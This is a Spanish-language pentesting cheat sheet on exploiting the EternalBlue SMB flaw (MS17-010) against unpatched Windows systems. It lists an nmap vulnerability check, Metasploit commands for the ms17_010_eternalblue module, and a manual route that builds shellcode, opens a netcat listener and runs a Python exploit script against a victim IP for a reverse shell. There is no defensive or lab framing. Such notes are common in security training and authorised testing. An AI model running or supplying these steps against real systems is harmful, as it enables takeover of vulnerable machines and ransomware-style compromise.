Esta vulnerabilidad permite la ejecución remota de código debido a un manejo incorrecto de los
paquetes SMB, lo que puede ser explotado para tomar el control de un sistema sin parches.
EternalBlue fue utilizada en ataques de ransomware notorios como WannaCry y NotPetya en 2017
:: 🔎 Comprobación Vulnerable con NMap
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nmap -sV -p445 --script=smb-vuln-ms17-010 <IP>
└───────────────────────────────────────────────────────────────────────────────────────────────────
Si el siguiente comando devuelve que es vulnerable, procederemos con la explotación
:: ▸ Explotación Metasploit (Recomendado)
Usando el módulo: exploit/windows/smb/ms17_010_eternalblue
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS
set LHOST
exploit
└───────────────────────────────────────────────────────────────────────────────────────────────────
:: ▸ Explotación Manual
Clonamos el siguiente repo a nuestro sistema
Recurso externo: abrir recurso
Instalamos las depencias: pip install -r requirements.txt
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
cd shellcode
./shell_prep.sh (y completamos los parámetros)
└───────────────────────────────────────────────────────────────────────────────────────────────────
Esto nos creara el binario que nos devolverá la reverse shell
Nos ponemos en escucha con netcat (Puerto 1234 en nuestro caso)
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nc -nvlp 1234
└───────────────────────────────────────────────────────────────────────────────────────────────────
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
python3 eternalblue_exploit7.py <IP_Victima> <shellcode creado>
└───────────────────────────────────────────────────────────────────────────────────────────────────